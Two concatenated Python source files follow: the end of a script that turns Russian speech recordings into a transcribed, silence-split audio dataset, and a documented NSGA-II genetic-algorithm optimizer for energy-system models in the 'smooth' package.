def config_logger(name: str, filename: str) -> logging.Logger:
"""Configure logger"""
logger = logging.getLogger()
logger.setLevel(logging.INFO)
logger.handlers = []
formatter = logging.Formatter(f'{name}: %(message)s')
fh = logging.FileHandler(LOG_DIR / f'{filename}.log', encoding='utf-8')
fh.setLevel(logging.INFO)
fh.setFormatter(formatter)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.addHandler(fh)
return logger
def silence_based_conversion(input_audio: Path, output_dir: Path, start_index: int) -> int:
"""function that splits the audio file into chunks and applies speech recognition"""
author = input_audio.parent.parts[-1]
rel_input = input_audio.relative_to(input_audio.parents[1])
logger = config_logger(str(rel_input), str(author))
try:
progress = json.loads(PROGRESS_FILE.read_text(encoding='utf-8'))
if progress.get(str(rel_input)):
logger.info('Already processed, skipping')
return progress.get(str(rel_input))
except FileNotFoundError:
pass
# open the audio file stored in the local system
if SOURCE_FORMAT == 'wav':
logger.info('Opening')
song = AudioSegment.from_wav(input_audio)
else:
logger.info('Converting to WAV')
song = AudioSegment.from_file(input_audio, 'mp3')
song = song.set_channels(1)
    # set the frame rate of the resulting audio
song = song.set_frame_rate(FRAME_RATE)
    # split the track where silence is MIN_SILENCE_LEN ms or longer and get chunks
logger.info('Splitting to chunks')
chunks = split_on_silence(song, MIN_SILENCE_LEN, SILENCE_THRESH, KEEP_SILENCE)
# create a directory to store output files
splitted = output_dir / author
if splitted.exists():
logger.info('Conversion was aborted. Continue...')
splitted.mkdir(exist_ok=True, parents=True)
chunk_file = splitted / 'check_temp.wav'
temp_file = splitted / 'temp.wav'
metadata_file = splitted / 'metadata.csv'
# additional clean. Use it if you want to remove chunks without speech.
if ADDITIONAL_CLEAN:
checked_chunks = [chunks[0]]
        # check each remaining chunk (chunks[0] is already kept, so the list is never empty)
        for chunk in chunks[1:]:
# Create 1000 milliseconds silence chunk
            # Silent chunks (1000 ms) are needed for Google recognition to work correctly
chunk_silent = AudioSegment.silent(duration=1000)
# Add silent chunk to beginning and end of audio chunk.
# This is done so that it doesn't seem abruptly sliced.
# We will send this chunk to google recognition service
audio_chunk_temp = chunk_silent + chunk + chunk_silent
# specify the bitrate to be 192k
# save chunk for google recognition as temp.wav
audio_chunk_temp.export(chunk_file, bitrate='192k', format='wav')
# create a speech recognition object
r = sr.Recognizer()
# recognize the chunk
with sr.AudioFile(str(chunk_file)) as source:
# remove this if it is not working correctly.
r.adjust_for_ambient_noise(source)
audio_listened = r.listen(source)
try:
# try converting it to text
                # if you use a language other than Russian, change the language code as described here https://cloud.google.com/speech-to-text/docs/languages
r.recognize_google(audio_listened, language='ru-RU')
checked_chunks.append(chunk)
logger.info('checking chunk - passed')
except sr.UnknownValueError:
logger.info('checking chunk - not passed')
except sr.RequestError:
logger.info('--- Could not request results. check your internet connection')
        # finally remove the temp file
chunk_file.unlink()
chunks = checked_chunks
# now recombine the chunks so that the parts are at least "target_length" long
output_chunks = [chunks[0]]
for chunk in chunks[1:]:
if len(output_chunks[-1]) < TARGET_LENGTH:
output_chunks[-1] += chunk
else:
output_chunks.append(chunk)
chunks = output_chunks
logger.info(f'Found {len(chunks)} chunks')
# Load pretrained models
norm = Normalizer()
# process each chunk
for counter, chunk in enumerate(chunks, start_index):
output_file = splitted / f'{author}_{counter:04d}.wav'
if output_file.exists():
logger.info(f'{output_file.relative_to(splitted)} already processed, skipping.')
continue
# Create 1000 milliseconds silence chunk
        # Silent chunks (1000 ms) are needed for Google recognition to work correctly
chunk_silent = AudioSegment.silent(duration=1000)
# Add silent chunk to beginning and end of audio chunk.
# This is done so that it doesn't seem abruptly sliced.
# We will send this chunk to google recognition service
audio_chunk_temp = chunk_silent + chunk + chunk_silent
# This chunk will be stored
audio_chunk = chunk
# export audio chunk and save it in the current directory.
# normalize the loudness in audio
audio_chunk = effects.normalize(audio_chunk)
# specify the bitrate to be 192k
# save chunk for google recognition as temp.wav
audio_chunk_temp.export(temp_file, bitrate='192k', format='wav')
logger.info(f'Processing {output_file.relative_to(splitted)}')
# create a speech recognition object
r = sr.Recognizer()
# recognize the chunk
with sr.AudioFile(str(temp_file)) as source:
# remove this if it is not working correctly.
r.adjust_for_ambient_noise(source)
audio_listened = r.listen(source)
try:
# try converting it to text
            # if you use a language other than Russian, change the language code as described here https://cloud.google.com/speech-to-text/docs/languages
rec = r.recognize_google(audio_listened, language='ru-RU').lower()
            # Google recognition returns numbers as digits, e.g. "1, 200, 35".
            # Text normalization reads these numbers and returns them as written Russian text, e.g. "один, двести, тридцать пять".
            # If you use a language other than Russian, replace this line.
rec = norm.norm_text(rec)
# bert punctuation - will place commas in text
if PUNCTUATION:
rec = [rec]
rec = BertPunctuation().predict(rec)
rec = (rec[0])
audio_length_ms = len(audio_chunk) # in milliseconds
audio_length_sec = float(len(audio_chunk)) / 1000 # in seconds
symbol_count = float(len(rec))
# here starts the filtering on symbol rate
if SYMBOLS_GATE:
if (symbol_count / audio_length_sec > SYMBOL_RATE_MIN) and (symbol_count / audio_length_sec < SYMBOL_RATE_MAX):
rate = int(symbol_count / audio_length_sec)
logger.info(f'Symbol rate {rate}')
# write the output to the metadata.csv.
                    with metadata_file.open(mode='a+', encoding='utf-8') as f:
f.write(f'{output_file.name}|{rec}|{rec}|{rate}|{audio_length_ms}\n')
# save audio file & update progress
audio_chunk.export(output_file, bitrate='192k', format='wav')
else:
logger.info('- text too short or too long')
else:
# write the output to the metadata.csv.
                with metadata_file.open(mode='a+', encoding='utf-8') as f:
f.write(f'{output_file.name}|{rec}|{rec}\n')
# save audio file & update progress
audio_chunk.export(output_file, bitrate='192k', format='wav')
        # catch any errors. Audio files with errors will not be mentioned in metadata.csv
except sr.UnknownValueError:
logger.info('-- Could not understand audio')
except sr.RequestError:
logger.info('--- Could not request results. Check your internet connection')
        # finally remove the temp file
temp_file.unlink()
try:
progress = json.loads(PROGRESS_FILE.read_text(encoding='utf-8'))
except FileNotFoundError:
progress = {}
progress[str(rel_input)] = len(chunks)
PROGRESS_FILE.write_text(json.dumps(progress, ensure_ascii=False, indent=4), encoding='utf-8')
return progress[str(rel_input)]
def process_dir(directory: Path, output_dir: Path, semaphore: Semaphore):
"""Process all audio files in directory"""
with semaphore:
last_index = 0
for audio_file in directory.glob(f'*.{SOURCE_FORMAT}'):
last_index = silence_based_conversion(audio_file, output_dir, last_index + 1)
def main():
"""Main function"""
parser = argparse.ArgumentParser()
parser.add_argument('input_dir', help='Input dir')
parser.add_argument('output_dir', help='Output dir')
args = parser.parse_args()
# get dirs to process
output_dir = Path(args.output_dir)
semaphore = Semaphore(PROCESSES_NUM)
all_processes = []
for author in Path(args.input_dir).glob('*'):
if author.is_dir():
p = Process(target=process_dir, args=(author, output_dir, semaphore))
all_processes.append(p)
p.start()
for p in all_processes:
p.join()
if __name__ == '__main__':
main()
|
run_optimization.py
|
"""This is the core of the genetic algorithm (GA) used for optimization.
It uses the `NSGA-II <https://www.sciencedirect.com/science/article/pii/S1877705811022466>`_
algorithm for multi-objective optimization of smooth components.
**********
How to use
**********
To use, call run_optimization with a configuration dictionary and your smooth model.
You will receive a list of :class:`Individual` in return. These individuals are
pareto-optimal in regard to the given objective functions (limited to two functions).
An example configuration can be seen in run_optimization_example in the
`examples directory <https://github.com/rl-institut/smooth/tree/dev/smooth/examples>`_.
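A minimal call sketch (the component name and attribute below are placeholders; all
parameter names follow the :class:`Optimization` and :class:`AttributeVariation`
documentation further down in this module)::

    opt_config = {
        'ga_params': {
            'population_size': 8,
            'n_generation': 5,
            'n_core': 'max',
            'attribute_variation': [
                {'comp_name': 'my_component', 'comp_attribute': 'power_max',
                 'val_min': 0, 'val_max': 1000, 'val_step': 100},
            ],
        },
    }
    pareto_front = run_optimization(opt_config, model)

The objective functions default to minimizing annual costs and emissions (see below).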
Objective functions
-------------------
You may specify your custom objective functions for optimization.
These should be lambdas that take the result from run_smooth and return a value.
Keep in mind that this algorithm always tries to maximize.
In order to minimize a value, return the negative value.
Example 1: maximize *power_max* of the first component::
lambda x: x[0].power_max
Example 2: minimize the annual costs::
lambda x: -sum([component.results['annuity_total'] for component in x])
Result
------
After the given number of generations or aborting, the result is printed to the terminal.
All individuals currently on the pareto front are returned in a list.
Their `values` member contain the component attribute values in the order
given by the `attribute_variation` dictionary from the optimization params.
In addition, when `SAVE_ALL_SMOOTH_RESULTS` is set to True, the `smooth_result`
member of each individual contains the value returned by run_smooth.
.. warning::
Using SAVE_ALL_SMOOTH_RESULTS and writing the result
to a file will generally lead to a large file size.
**************
Implementation
**************
Like any GA, this implementation simulates a population which converges
to an optimal solution over multiple generations.
As there are multiple objectives, the solution takes the form of a pareto-front,
where no solution is dominated by another while maintaining distance to each other.
We take care to compute each individual configuration only once.
The normal phases of a GA still apply:
* selection
* crossover
* mutation
Population initialisation
-------------------------
At the start, a population is generated.
The size of the population must be declared (`population_size`).
Each component attribute to be varied in the smooth_model corresponds
to a gene in an individual. The genes are initialized randomly with a uniform
distribution between the minimum and maximum value of its component attribute.
These values may adhere to a step size (*val_step* in :class:`AttributeVariation`).
Selection
---------
We compute the fitness of all individuals in parallel.
You must set `n_core` to specify how many threads should be active at the same time.
This can be either a number or 'max' to use all virtual cores on your machine.
The fitness evaluation follows these steps:
#. change your smooth model according to the individual's component attribute values
#. run smooth
#. on success, compute the objective functions using the smooth result. \
These are the fitness values. On failure, print the error
#. update the master individual on the main thread with the fitness values
#. update the reference in the dictionary containing all evaluated individuals
After all individuals in the current generation have been evaluated,
they are sorted into tiers by NSGA-II fast non-dominated sorting algorithm.
Only individuals on the pareto front are retained,
depending on their distance to their neighbors.
The parent individuals stay in the population, so they can appear in the pareto front again.
Crossover
---------
These individuals form the base of the next generation; they are the parents.
For each child in the next generation, genes from two randomly selected parents
are taken (uniform crossover of independent genes).
Mutation
--------
After crossover, each child has a random number of genes mutated.
The mutated value is around the original value, taken from a normal distribution.
Special care must be taken to stay within the component attribute's range
and to adhere to a strict step size.
After crossover and mutation, we check that this individual's gene sequence
has not been encountered before (as this would not lead to new information
and waste computing time). Only then is it admitted into the new generation.
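As a rough sketch, the quantisation and clipping performed in :func:`mutate` below
amount to::

    value = random.gauss(value, sigma)
    if av.val_step:
        value = round((value - av.val_min) / av.val_step) * av.val_step + av.val_min
    value = min(max(value, av.val_min), av.val_max)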
Special cases
-------------
We impose an upper limit of 1000 * `population_size` on the number of tries to
find new children. This counter is reset for each generation. If it is exceeded
and no new gene sequences have been found, the algorithm aborts and returns the current result.
In case no individuals have a valid smooth result, an entirely new population is generated.
No plot will be shown.
If only one individual is valid, the population is filled up with random individuals.
Gradient ascent
---------------
The solutions of the GA are pareto-optimal, but may not be at a local optimum.
Although new candidate configurations are generated near the current ones,
finding slight improvements is not guaranteed.
This is especially true if there are many dimensions to search
and the change is in only one dimension.
The chance to happen upon this single improvement is in
inverse proportion to the number of attribute variations.
Therefore, the *post_processing* option exists to follow the
fitness gradient for each solution after the GA has finished.
We assume that each attribute is independent of each other.
All solutions improve the same attribute at the same time.
The number of fitness evaluations may exceed the *population_size*,
however, the maximum number of cores used stays the same as before.
To find the local optimum of a single attribute of a solution,
we first have to find the gradient.
This is done by going one *val_step* in positive and negative direction.
These new children are then evaluated. Depending on the domination,
the gradient may be *+val_step*, -*val_step* or 0 (parent is optimal).
Then, this gradient is followed until the child shows no improvement.
The population may be topped up with multiples of *val_step*
to better utilize all cores and speed up the gradient ascent.
After all solutions have found their optimum for this attribute,
the next attribute is varied.
Plotting
--------
To visualize the current progress,
you can set the *plot_progress* simulation parameter to True.
This will show the current pareto front in a pyplot window.
You can mouse over the points to show the configuration and objective values.
To keep the computation running in the background (non-blocking plots)
while listening for user events, the plotting runs in its own process.
On initialisation, a one-directional pipe is established to send data
from the main computation to the plotting process.
The process is started right at the end of the initialisation.
It needs the attribute variations and objective names for hover info and axes labels.
It also generates a multiprocessing event which checks if the process shall be stopped.
In the main loop of the process, the pipe is checked for any new data.
This incorporates a timeout to avoid high processor usage.
If new data is available, the old plot is cleared
(along with any annotations, labels and titles) and redrawn from scratch.
In any case, the window listens for a short time for user input events like mouseover.
Window close is a special event which stops the process,
but not the computation (as this runs in the separate main process).
When hovering with the mouse pointer over a point in the pareto front,
an annotation is built with the info of the :class:`Individual`.
The annotation is removed when leaving the point. A simple example
of how this looks is illustrated in Figure 1. In this example,
after the first generation there is one optimal energy system
found which costs 244,416.21 EUR and produces 0 emissions.
.. figure:: /images/pareto_annotation.png
:width: 60 %
:alt: pareto_annotation.png
:align: center
Fig.1: Simple diagram of a pareto front with annotations
Sending None through the pipe makes the process show the plot until the user closes it.
This blocks the process, so no new data is received, but user events are still processed.
"""
import multiprocessing as mp
from tkinter import TclError # plotting window closed
import random
import matplotlib.pyplot as plt # only needed when plot_progress is set
import os # delete old result files
from datetime import datetime # get timestamp for filename
import pickle # pickle intermediate results
import dill # dump objective functions
from smooth import run_smooth
# import traceback
# def tb(e):
# traceback.print_exception(type(e), e, e.__traceback__)
class AttributeVariation:
"""Class that contains all information about an attribute that is varied by the genetic algorithm
:param comp_name: name of component that gets varied
:type comp_name: string
:param comp_attribute: component attribute that gets varied
:type comp_attribute: string
:param val_min: minimum value of component attribute
:type val_min: number
:param val_max: maximum value of component attribute (inclusive)
:type val_max: number
:param val_step: step size of component attribute
:type val_step: number, optional
:var num_steps: number of steps if *val_step* is set and not zero
:type num_steps: int
:raises: AssertionError when any non-optional parameter is missing or *val_step* is negative
"""
def __init__(self, iterable=(), **kwargs):
self.val_step = None
self.__dict__.update(iterable, **kwargs)
assert hasattr(self, "comp_name"), "comp_name missing"
assert hasattr(self, "comp_attribute"), "{}: comp_attribute missing".format(self.comp_name)
assert hasattr(
self, "val_min"), "{} - {}: val_min missing".format(self.comp_name, self.comp_attribute)
assert hasattr(
self, "val_max"), "{} - {}: val_max missing".format(self.comp_name, self.comp_attribute)
if self.val_step == 0:
print("{} - {}: ignore val_step".format(self.comp_name, self.comp_attribute))
if self.val_step:
assert self.val_step >= 0, "{} - {}: val_step < 0".format(
self.comp_name, self.comp_attribute)
self.num_steps = int((self.val_max - self.val_min)/self.val_step) + 1
class Individual:
""" Class for individuals evaluated by the genetic algorithm
:param values: attribute values (individual configuration)
:type values: list
:var values: given values
:var fitness: fitness values depending on objective functions
:type fitness: tuple
:var smooth_result: result from `run_smooth`
"""
class IndividualIterator:
"""Class to iterate over gene values.
"""
def __init__(self, individual):
self._idx = 0
self.individual = individual
def __next__(self):
try:
return self.individual.values[self._idx]
except IndexError:
raise StopIteration
finally:
self._idx += 1
values = None # list. Take care when copying.
fitness = None # tuple
smooth_result = None # result of run_smooth
def __init__(self, values):
self.values = values
def __str__(self):
return str(self.values)
# enable iteration over values
def __iter__(self):
return self.IndividualIterator(self)
def __len__(self):
return len(self.values)
# access values directly
def __getitem__(self, idx):
return self.values[idx]
def __setitem__(self, idx, value):
self.values[idx] = value
def dominates(self, other):
"""Define dominance between individuals
:param other: individual for comparison
:type other: :class:`Individual`
:return: True if both fitness values are greater or
one is greater while the other is equal. False otherwise.
:rtype: boolean
"""
return self.fitness is not None and (other.fitness is None or (
(self.fitness[0] >= other.fitness[0] and self.fitness[1] > other.fitness[1]) or
(self.fitness[0] > other.fitness[0] and self.fitness[1] >= other.fitness[1])))
def sort_by_values(n, values):
"""Sort values
:param values: values to sort
:type values: iterable
:param n: maximum number of returned values
:type n: int
:return: list of indices that correspond to the values sorted in ascending order, `n` maximum
:rtype: list
"""
return [i for e, i in sorted((e, i) for i, e in enumerate(values))][:n]
def fast_non_dominated_sort(p):
"""NSGA-II's fast non dominated sort
:param p: values to sort
:type p: iterable
:return: indices of values sorted into their domination ranks (only first element used)
:rtype: list of lists of indices
"""
    S = [[] for _ in p] # S[i]: indices of the values dominated by p[i]
    front = [[]] # front[k]: indices of the values in domination rank k
    n = [0]*len(p) # n[i]: how many values dominate the value at this position
# rank = [0]*len(p) # rank within domination tree (unused)
# compare all elements, see which ones dominate each other
for i in range(0, len(p)):
for j in range(0, len(p)):
if p[i].dominates(p[j]) and j not in S[i]:
S[i].append(j)
elif p[j].dominates(p[i]):
n[i] += 1
if n[i] == 0:
# element is not dominated: put in front
# rank[i] = 0
if i not in front[0]:
front[0].append(i)
i = 0
while(len(front[i]) > 0):
Q = []
for p in front[i]:
for q in S[p]:
n[q] -= 1
if n[q] == 0:
# rank[q] = i+1
if q not in Q:
Q.append(q)
i = i+1
front.append(Q)
if len(front) > 1:
front.pop(len(front) - 1)
return front
def CDF(values1, values2, n):
"""Calculate crowding distance
:param values1: values in first dimension
:type values1: iterable
:param values2: values in second dimension
:type values2: iterable
:param n: maximum number of values
:type n: int
:return: `n` crowding distance values
:rtype: list
"""
if (n == 0 or len(values1) != n or len(values2) != n or
max(values1) == min(values1) or max(values2) == min(values2)):
return [1e100]*n
distance = [0]*n
sorted1 = sort_by_values(n, values1)
sorted2 = sort_by_values(n, values2)
distance[0] = 1e100 # border
distance[-1] = 1e100
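    # standard NSGA-II crowding distance: for each objective, accumulate the normalized
    # gap between a point's two neighbours when the points are sorted by that objective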
    for k in range(1, n-1):
        distance[k] = distance[k] + (values1[sorted1[k+1]] -
                                     values1[sorted1[k-1]])/(max(values1)-min(values1))
    for k in range(1, n-1):
        distance[k] = distance[k] + (values2[sorted2[k+1]] -
                                     values2[sorted2[k-1]])/(max(values2)-min(values2))
return distance
def crossover(parent1, parent2):
"""Uniform crossover between two parents
Selects random (independent) genes from one parent or the other
:param parent1: First parent
:type parent1: :class:`Individual`
:param parent2: Second parent
:type parent2: :class:`Individual`
:return: Crossover between parents
:rtype: :class:`Individual`
"""
child = Individual([gene for gene in parent1]) # copy parent1
for gene_idx, gene in enumerate(parent2):
if random.random() < 0.5:
child[gene_idx] = gene
return child
def mutate(parent, attribute_variation):
"""Mutate a random number of parent genes around original value, within variation
:param parent: parent individual
:type parent: :class:`Individual`
:param attribute_variation: AV for all genes in parent
:type attribute_variation: list of :class:`AttributeVariation`
:return: child with some parent genes randomly mutated
:rtype: :class:`Individual`
"""
# copy parent genes
child = Individual([gene for gene in parent])
# change between one and all genes of parent
num_genes_to_change = random.randint(1, len(child))
# get indices of genes to change
genes_to_change = random.sample(range(len(child)), num_genes_to_change)
for mut_gene_idx in genes_to_change:
value = child[mut_gene_idx]
# compute smallest distance to min/max of attribute
val_min = attribute_variation[mut_gene_idx].val_min
val_max = attribute_variation[mut_gene_idx].val_max
delta_min = value - val_min
delta_max = val_max - value
delta = min(delta_min, delta_max)
# sigma influences spread of random numbers
# try to keep between min and max of attribute
sigma = delta / 3.0 if delta > 0 else 1.0
# get new value within normal distribution around current value
value = random.gauss(value, sigma)
if attribute_variation[mut_gene_idx].val_step:
# quantize new value
step = attribute_variation[mut_gene_idx].val_step
value = round((value - val_min) / step) * step + val_min
# clip value to bounds
value = min(max(value, val_min), val_max)
child[mut_gene_idx] = value
return child
def fitness_function(
index, individual,
model,
attribute_variation,
dill_objectives,
ignore_zero=False,
save_results=False):
"""Compute fitness for one individual
Called async: copies of individual and model given
:param index: index within population
:type index: int
:param individual: individual to evaluate
:type individual: :class:`Individual`
:param model: smooth model
:type model: dict
:param attribute_variation: attribute variations
:type attribute_variation: list of :class:`AttributeVariation`
:param dill_objectives: objective functions
:type dill_objectives: tuple of lambda-functions pickled with dill
:param ignore_zero: ignore components with an attribute value of zero
:type ignore_zero: boolean
:param save_results: save smooth result in individual?
:type save_results: boolean
:return: index, modified individual with fitness (None if failed)
and smooth_result (none if not save_results) set
:rtype: tuple(int, :class:`Individual`)
"""
# update (copied) oemof model
for i, av in enumerate(attribute_variation):
if ignore_zero and individual[i] == 0:
# remove component with zero value from model
# use pop instead of del in case component is removed multiple times
model['components'].pop(av.comp_name, None)
else:
model['components'][av.comp_name][av.comp_attribute] = individual[i]
# Now that the model is updated according to the genes given by the GA, run smooth
try:
smooth_result = run_smooth(model)[0]
individual.smooth_result = smooth_result if save_results else None
# update fitness with given objective functions
objectives = dill.loads(dill_objectives)
individual.fitness = tuple(f(smooth_result) for f in objectives)
except Exception as e:
        # The smooth run failed. The fitness score remains None.
print('Evaluation canceled ({})'.format(str(e)))
return index, individual
class PlottingProcess(mp.Process):
"""Process for plotting the intermediate results
    Data is sent through a (one-directional) pipe.
It should be a dictionary containing "values" (array of :class:`Individual`)
and "gen" (current generation number, displayed in title).
Send None to stop listening for new data and block the Process by showing the plot.
After the user closes the plot, the process returns and can be joined.
:param pipe: data transfer channel
:type pipe: `multiprocessing pipe \
<https://docs.python.org/3/library/multiprocessing.html#multiprocessing.Pipe>`_
:param attribute_variation: AV of :class:`Optimization`
:type attribute_variation: list of :class:`AttributeVariation`
:param objective_names: descriptive names of :class:`Optimization` objectives
:type objective_names: list of strings
:var exit_flag: Multiprocessing event signalling process should be stopped
:var fig: figure for plotting
:var ax: current graphic axis for plotting
:var points: plotted results or None
:var annot: current annotation or None
"""
def __init__(self):
self.exit_flag = mp.Event()
self.exit_flag.clear()
def main(self):
"""Main plotting thread
Loops while exit_flag is not set and user has not closed window.
Checks periodically for new data to be displayed.
"""
# start of main loop: no results yet
plt.title("Waiting for first results...")
# loop until exit signal
while not self.exit_flag.is_set():
# poll with timeout (like time.sleep)
while self.pipe.poll(0.1):
# something in pipe
data = self.pipe.recv()
if data is None:
# special case
plt.title("Finished!")
# block process until user closes window
plt.show()
# exit process
return
else:
# process sent data
# save sent results to show in annotation later
self.values = data["values"]
                        # note: wrap r.fitness[...] in abs() below if you prefer to display positive values
f1_vals = [r.fitness[0] for r in data["values"]]
f2_vals = [r.fitness[1] for r in data["values"]]
# reset figure
self.ax.clear()
# redraw plot with new data
self.points, = self.ax.plot(f1_vals, f2_vals, '.b')
# new title and labels
plt.title(data.get("title", "Pareto front"), {'zorder': 1})
plt.xlabel(self.objective_names[0])
plt.ylabel(self.objective_names[1])
self.fig.canvas.draw()
try:
# redraw plot, capture events
plt.pause(0.1)
except TclError:
# window may have been closed: exit process
return
# exit signal sent: stop process
return
def handle_close(self, event):
"""Called when user closes window
Signal main loop that process should be stopped.
"""
self.exit_flag.set()
def hover(self, event):
"""Called when user hovers over plot.
Checks if user hovers over point. If so, delete old annotation and
        create new one with relevant info from all Individuals corresponding to this point.
If user does not hover over point, remove annotation, if any.
"""
if self.points and event.inaxes == self.ax:
# results shown, mouse within plot: get event info
# cont: any points hovered?
# ind: list of points hovered
cont, ind = self.points.contains(event)
if cont and "ind" in ind:
ind = ind["ind"]
# points hovered
# get all point coordinates
x, y = self.points.get_data()
text = []
for idx in ind:
# loop over points hovered
ind_text = ""
max_line_len = 0
# list all attribute variations with name and value
for av_idx, av in enumerate(self.attribute_variation):
line = "{}.{}: {}\n".format(
av.comp_name,
av.comp_attribute,
self.values[idx][av_idx])
ind_text += line
max_line_len = max(max_line_len, len(line))
# separator line
ind_text += '-'*max_line_len + "\n"
# list all objectives with name and value
for obj_idx, obj in enumerate(self.objective_names):
ind_text += "{}: {}\n".format(obj, self.values[idx].fitness[obj_idx])
text.append(ind_text)
text = "\n".join(text)
# remove old annotation
if self.annot:
self.annot.remove()
# create new annotation
self.annot = self.ax.annotate(
text,
xy=(x[ind[0]], y[ind[0]]),
xytext=(-20, 20),
textcoords="offset points",
bbox=dict(boxstyle="round", fc="w"),
arrowprops={'arrowstyle': "-"},
annotation_clip=False)
# self.annot.get_bbox_patch().set_alpha(0.4)
self.fig.canvas.draw()
elif self.annot and self.annot.get_visible():
# no point hovered, but annotation present: remove annotation
self.annot.remove()
self.annot = None
self.fig.canvas.draw()
def __call__(self, pipe, attribute_variation, objective_names):
"""Process entry point.
Set up plotting window, necessary variables and callbacks, call main loop.
"""
self.pipe = pipe
self.attribute_variation = attribute_variation
self.objective_names = objective_names
self.fig, self.ax = plt.subplots()
self.points = None
self.annot = None
self.fig.canvas.mpl_connect('close_event', self.handle_close)
self.fig.canvas.mpl_connect("motion_notify_event", self.hover)
self.main()
class Optimization:
"""Main optimization class to save GA parameters
:param n_core: number of threads to use.
May be 'max' to use all (virtual) cores
:type n_core: int or 'max'
:param n_generation: number of generation to run
:type n_generation: int
:param population_size: number of new children per generation.
The actual size of the population may be higher -
however, each individual is only evaluated once
:type population_size: int
:param attribute_variation: attribute variation information that will be used by the GA
:type attribute_variation: list of dicts, see :class:`AttributeVariation`
:param model: smooth model
:type model: dict
:param objectives: multi-objectives to optimize.
These functions take the result from `run_smooth` and return a float.
Positive sign maximizes, negative sign minimizes.
Defaults to minimizing annual costs and emissions
:type objectives: 2-tuple of lambda functions
:param objective_names: descriptive names for optimization functions.
Defaults to ('costs', 'emissions')
:type objective_names: 2-tuple of strings, optional
:param post_processing: improve GA solution with gradient ascent. Defaults to False
:type post_processing: boolean, optional
:param plot_progress: plot current pareto front. Defaults to False
:type plot_progress: boolean, optional
:param ignore_zero: ignore components with an attribute value of zero. Defaults to False
:type ignore_zero: boolean, optional
:param save_intermediate_results: write intermediate results to pickle file.
Only the two most recent results are saved. Defaults to False
:type save_intermediate_results: boolean, optional
:param SAVE_ALL_SMOOTH_RESULTS: save return value of `run_smooth`
for all evaluated individuals.
**Warning!** When writing the result to file,
this may greatly increase the file size. Defaults to False
:type SAVE_ALL_SMOOTH_RESULTS: boolean, optional
:var population: current individuals
:type population: list of Individual
:var evaluated: keeps track of evaluated individuals to avoid double computation
:type evaluated: dict with fingerprint of individual->:class:`Individual`
:var ax: current figure handle for plotting
:type ax: pyplot Axes
:raises: `AttributeError` or `AssertionError` when required argument is missing or wrong
"""
def __init__(self, iterable=(), **kwargs):
# set defaults
self.post_processing = False
self.plot_progress = False
self.ignore_zero = False
self.save_intermediate_results = False
self.SAVE_ALL_SMOOTH_RESULTS = False
# objective functions: tuple with lambdas
# negative sign for minimizing
# defaults to minimum of annual costs and emissions
self.objectives = (
lambda x: -sum([c.results["annuity_total"] for c in x]),
lambda x: -sum([c.results["annual_total_emissions"] for c in x]),
)
# objective names for plotting
self.objective_names = ('costs', 'emissions')
# set parameters from args
self.__dict__.update(iterable, **kwargs)
# how many CPU cores to use
try:
assert(self.n_core)
except (AssertionError, AttributeError):
print("No CPU count (n_core) given. Using all cores.")
self.n_core = mp.cpu_count()
if self.n_core == "max":
self.n_core = mp.cpu_count()
# population size
try:
assert(self.population_size)
except (AssertionError, AttributeError):
raise AssertionError("No population size given")
# number of generations to run
# TODO run until no more change?
try:
assert(self.n_generation)
except (AssertionError, AttributeError):
raise AssertionError("Number of generations not set")
# attribute variation
try:
assert(self.attribute_variation)
except (AssertionError, AttributeError):
raise AssertionError("No attribute variation given")
self.attribute_variation = [AttributeVariation(av) for av in self.attribute_variation]
# oemof model to solve
try:
assert(self.model)
except (AssertionError, AttributeError):
raise AssertionError("No model given.")
# objectives
assert len(self.objectives) == 2, "Need exactly two objective functions"
assert len(self.objectives) == len(
self.objective_names), "Objective names don't match objective functions"
# Init population with random values between attribute variation (val_max inclusive)
self.population = []
self.evaluated = {}
# save intermediate results?
if self.save_intermediate_results:
self.last_result_file_name = ""
self.current_result_file_name = ""
# plot intermediate results?
if self.plot_progress:
# set up plotting process with unidirectional pipe
plot_pipe_rx, self.plot_pipe_tx = mp.Pipe(duplex=False)
self.plot_process = mp.Process(
target=PlottingProcess(),
args=(plot_pipe_rx, self.attribute_variation, self.objective_names))
self.plot_process.start()
def err_callback(self, err_msg):
"""Async error callback
:param err_msg: error message to print
:type err_msg: string
"""
print('Callback error at parallel computing! The error message is: {}'.format(err_msg))
def set_fitness(self, result):
"""Async success callback
Update master individual in population and `evaluated` dictionary
:param result: result from fitness_function
:type result: tuple(index, :class:`Individual`)
"""
self.population[result[0]] = result[1]
self.evaluated[str(result[1])] = result[1]
def compute_fitness(self):
"""Compute fitness of every individual in `population` with `n_core` worker threads.
Remove invalid individuals from `population`
"""
# open n_core worker threads
pool = mp.Pool(processes=self.n_core)
# set objective functions for each worker
dill_objectives = dill.dumps(self.objectives)
for idx, ind in enumerate(self.population):
if ind.fitness is None: # not evaluated yet
pool.apply_async(
fitness_function,
(idx, ind, self.model, self.attribute_variation,
dill_objectives, self.ignore_zero, self.SAVE_ALL_SMOOTH_RESULTS),
callback=self.set_fitness,
error_callback=self.err_callback # tb
)
pool.close()
pool.join()
def save_intermediate_result(self, result):
"""Dump result into pickle file in current working directory.
Same content as smooth.save_results.
        The naming scheme is *date*_*time*_intermediate_result.pickle.
Removes second-to-last pickle file from same run.
:param result: the current results to be saved
:type result: list of :class:`Individual`
"""
# prepare file name by format
filename_format = "%Y-%m-%d_%H-%M-%S_intermediate_result.pickle"
new_result_file_name = datetime.now().strftime(filename_format)
# write result to file
with open(new_result_file_name, 'wb') as save_file:
pickle.dump(result, save_file)
# delete second-to-last result file (if not rewritten)
if (os.path.exists(self.last_result_file_name)
and self.last_result_file_name != self.current_result_file_name):
os.remove(self.last_result_file_name)
# update status
self.last_result_file_name = self.current_result_file_name
self.current_result_file_name = new_result_file_name
print("Save intermediate results in {}".format(new_result_file_name))
def gradient_ascent(self, result):
"""Try to fine-tune result(s) with gradient ascent
Attributes are assumed to be independent and varied separately.
Solutions with the same fitness are ignored.
:param result: result from GA
:type result: list of :class:`Individual`
:return: improved result
:rtype: list of :class:`Individual`
"""
print('\n+++++++ Intermediate result +++++++')
for i, v in enumerate(result):
print(i, v.values, " -> ", dict(zip(self.objective_names, v.fitness)))
print('+++++++++++++++++++++++++++++++++++\n')
new_result = []
# ignore solutions with identical fitness
for i in range(len(result)):
known_fitness = False
for j in range(len(new_result)):
known_fitness |= new_result[j].fitness == result[i].fitness
if not known_fitness:
new_result.append(result[i])
num_results = len(new_result)
for av_idx, av in enumerate(self.attribute_variation):
# iterate attribute variations (assumed to be independent)
print("Gradient descending {} / {}".format(av_idx+1, len(self.attribute_variation)))
